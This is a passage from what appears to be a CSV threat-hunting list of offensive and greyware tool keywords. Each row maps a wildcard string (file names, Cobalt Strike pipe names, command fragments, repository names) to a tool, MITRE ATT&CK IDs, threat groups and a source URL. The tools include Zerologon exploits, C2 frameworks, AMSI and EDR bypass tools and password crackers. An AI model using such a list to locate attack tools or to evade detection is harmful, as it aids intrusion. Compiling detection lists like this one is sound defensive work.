tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*zerologon.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" 
+"*zerologon.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*zerologon.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 
- TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*zerologon_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ZeroLogon-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*zerologon-restore * -target-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ZeroLogonScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*ZeroMemoryEx/Amsi-Killer*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*ZeroMemoryEx/Blackout*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*zerosum0x0*","offensive_tool_keyword","zerosum0x0","github repo username hosting backdoors pocs and exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/zerosum0x0","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*zerosum0x0*koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ZGF0YS5mZGEuZ292*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*ZGIuc3NhLmdvdg==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*zha0gongz1*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*zha0gongz1/DesertFox*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*Ziconius/FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*ziiiiizzzb*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" 
+"*ziiiiizzzib*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*zip2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ZipFileName $TrustedDomain.zip*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*zippy.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Zloader-FCVP*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zmap -*","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. 
ZMaps sister project that performs stateful application-layer handshakes.","T1046 - T1065 - T1210.002 - T1095 - T1040","TA0002 - TA0007 - TA0008 - TA0011 - TA0001","N/A","N/A","Vulnerability scanner","https://github.com/zmap/zmap","1","0","greyware tool - risks of False positive !","N/A","10","5011","887","2023-09-26T15:13:35Z","2013-01-23T01:30:09Z" +"*zoom1.msi.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zoom2.dll.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*zsh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*zsploit-1.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*zsploit-2.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ztgrace*changeme*","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1350","264","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" +"*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*ZXZpZGVuY2UuZmJpLmdvdg==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*zyn3rgy/LdapRelayScan*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*zzzteph/weakpass*","offensive_tool_keyword","weakpass","Weakpass 
collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*Zzzz Zzzzz Zzzz....*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"./beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"./CVE-20* -*","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z" +"./radare *","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" +".exe -t keepass -f *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"/adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an 
advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\DserNamePipe*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\f4c3*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names 